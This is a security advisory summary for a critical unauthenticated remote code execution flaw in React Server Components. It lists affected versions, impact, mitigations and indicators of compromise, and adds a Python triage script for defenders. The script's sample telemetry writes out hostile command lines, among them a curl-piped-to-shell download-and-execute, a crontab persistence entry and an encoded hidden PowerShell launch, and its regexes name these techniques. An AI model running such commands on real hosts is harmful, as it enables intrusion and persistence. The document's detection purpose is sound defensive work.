Full Report
The availability of exploit code will likely lead to more widespread opportunistic attacks
Analysis Summary
# Vulnerability: React2Shell Remote Code Execution Flaw
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: **10.0 (Critical)**
- CWE: Insufficient Validation of Deserialized Data (Implied by behavior)
## Affected Systems
- Products: React Server Components (and frameworks relying on its deserialization logic, e.g., Next.js)
- Versions: 19.0.0, 19.1.0, 19.1.1, and 19.2.0
- Configurations: Server environments processing requests via the React "Flight" protocol.
## Vulnerability Description
The React2Shell vulnerability is a critical flaw residing in how React Server Components (RSC) deserialize data sent from the client browser via the React "Flight" protocol. The server performs insufficient validation when translating network requests into internal JavaScript objects. This allows an attacker to send a specially crafted, malformed HTTP request that is processed instead of rejected. Successful exploitation enables the attacker to interfere with the application's internal execution flow, leading to Remote Code Execution (RCE) with the privileges of the running application. The attack requires only network access to the vulnerable endpoint; no authentication is necessary.
## Exploitation
- Status: **Exploited in the wild** (Widespread exploitation observed)
- Complexity: **Low** (Attack carried out via a single malicious HTTP request)
- Attack Vector: **Network** (Remote, unauthenticated)
## Impact
- Confidentiality: **High** (Potential access to sensitive data)
- Integrity: **High** (Ability to alter application behavior)
- Availability: **High** (Potential for full server compromise)
## Remediation
### Patches
- The article implies patches are available following the disclosure on December 3, 2025, but specific version numbers for the *fixed* React Server Components are **not listed** in the provided text. Users must consult the official React release advisories for patched versions.
### Workarounds
- No direct workarounds are explicitly detailed, but immediate mitigation involves:
  - Updating affected React Server Component packages to versions outside the vulnerable range.
  - Implementing strict Web Application Firewall (WAF) rules or layer 7 ingress controls to inspect and potentially block malformed Flight protocol requests if immediate patching is impossible.
## Detection
- **Indicators of Compromise (IOCs):**
  - Rapid deployment of Linux loaders and persistence mechanisms (systemd, cron, rc.local).
  - Covert installation of Node.js and obfuscated JavaScript in hidden directories.
  - Outbound network connections to public cloud infrastructure or multiple C2 servers.
  - Use of Canarytoken URLs or webhooks for exfiltration/telemetry.
  - Execution of suspicious shell commands (`/bin/sh`, `curl`) on Linux or PowerShell commands on Windows post-exploitation.
- **Detection Methods and Tools:**
  - Monitoring endpoint activity for suspicious file creation or modification in hidden directories related to Node.js execution.
  - Network monitoring for unusual outbound traffic patterns indicative of C2 communication or data exfiltration.
  - Endpoint Detection and Response (EDR) tools configured to flag the execution of shell scripts downloaded and executed via web requests.
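The following is an added example, not part of the original report or any vendor tooling, showing how the post-exploitation indicators above can be turned into simple triage rules run over process telemetry. The input lines, the rule names, the regular expressions and the host names and addresses in the sample data are all constructed for illustration; the patterns are assumptions tuned to this report's indicator list, not published signatures, and should be tuned to the environment before use.

```python
"""Triage of process telemetry for the post-exploitation indicators listed above.

Input: one string per process event, in the shape an EDR export or
`ps -eo pid,user,args` would produce (sample lines below are constructed).
Output: a list of findings naming which indicator each line matched.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    line: str


# Patterns are assumptions derived from the IOC bullets in this report.
# curl/wget output piped straight into a shell (download-and-execute loader)
_SHELL_PIPE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(/bin/)?(ba|da)?sh\b")
# a `node` / `nodejs` token, whether the binary itself or an argument
_NODE_TOKEN = re.compile(r"(^|[=/\s])node(js)?(\s|$)")
# any path segment that is a hidden directory, e.g. /var/tmp/.cache/
_HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")
# Canarytoken or generic webhook endpoints used as beacons
_BEACON = re.compile(r"canarytokens\.com|/api/webhooks/|hooks\.slack\.com", re.I)
# writes to the persistence locations named in the report (cron, rc.local, systemd)
_PERSIST = re.compile(
    r"crontab\s+-|/etc/cron\.d/|/etc/rc\.local|/etc/systemd/system/|systemctl\s+enable\b"
)
# PowerShell launched with an encoded command or an in-memory download/exec idiom
_PWSH = re.compile(
    r"powershell(\.exe)?\b.*?(\s-enc(odedcommand)?\b|\biex\b|invoke-expression|downloadstring)",
    re.I,
)

RULES = [
    ("curl_pipe_shell", lambda s: bool(_SHELL_PIPE.search(s))),
    # Node.js running from, or loading a script out of, a hidden directory
    ("node_hidden_dir", lambda s: bool(_NODE_TOKEN.search(s) and _HIDDEN_DIR.search(s))),
    ("canarytoken_or_webhook", lambda s: bool(_BEACON.search(s))),
    ("persistence_write", lambda s: bool(_PERSIST.search(s))),
    ("powershell_download_exec", lambda s: bool(_PWSH.search(s))),
]

# Constructed sample telemetry: two benign lines plus one line per indicator.
SAMPLE_TELEMETRY = [
    "pid=4120 user=node cmd=node /srv/app/server.js",
    "pid=4133 user=node cmd=/bin/sh -c curl -s http://203.0.113.7/x.sh | sh",
    "pid=4140 user=node cmd=/var/tmp/.cache/node /var/tmp/.cache/a.js",
    "pid=4151 user=node cmd=/bin/sh -c curl -s http://example.canarytokens.com/ping",
    "pid=4162 user=root cmd=/bin/sh -c echo '@reboot /var/tmp/.cache/node /var/tmp/.cache/a.js' | crontab -",
    "pid=4170 user=root cmd=apt-get update",
    "pid=912 user=SYSTEM cmd=powershell.exe -nop -w hidden -enc BASE64PLACEHOLDER",
]


def scan_lines(lines):
    """Return one Finding per (line, matching rule); a line may match several rules."""
    findings = []
    for line in lines:
        for name, pred in RULES:
            if pred(line):
                findings.append(Finding(name, line))
    return findings


def summarize(findings):
    """Count findings per rule, useful as a first-pass dashboard figure."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_TELEMETRY):
        print(f"[{f.rule}] {f.line}")
    print(summarize(scan_lines(SAMPLE_TELEMETRY)))
```

The crontab line matches two rules at once (persistence write and Node.js in a hidden directory), which is the kind of overlap worth surfacing as a single higher-priority alert rather than two separate ones; the benign `node /srv/app/server.js` line shows why the hidden-directory rule is gated on both conditions instead of firing on every Node.js process.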
## References
- Vendor Advisory (React Disclosure): hXXps://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- NVD Entry: hXXps://nvd.nist.gov/vuln/detail/CVE-2025-55182
- Research Identifying Scope: hXXps://infosec.exchange/@shadowserver/115690544827801847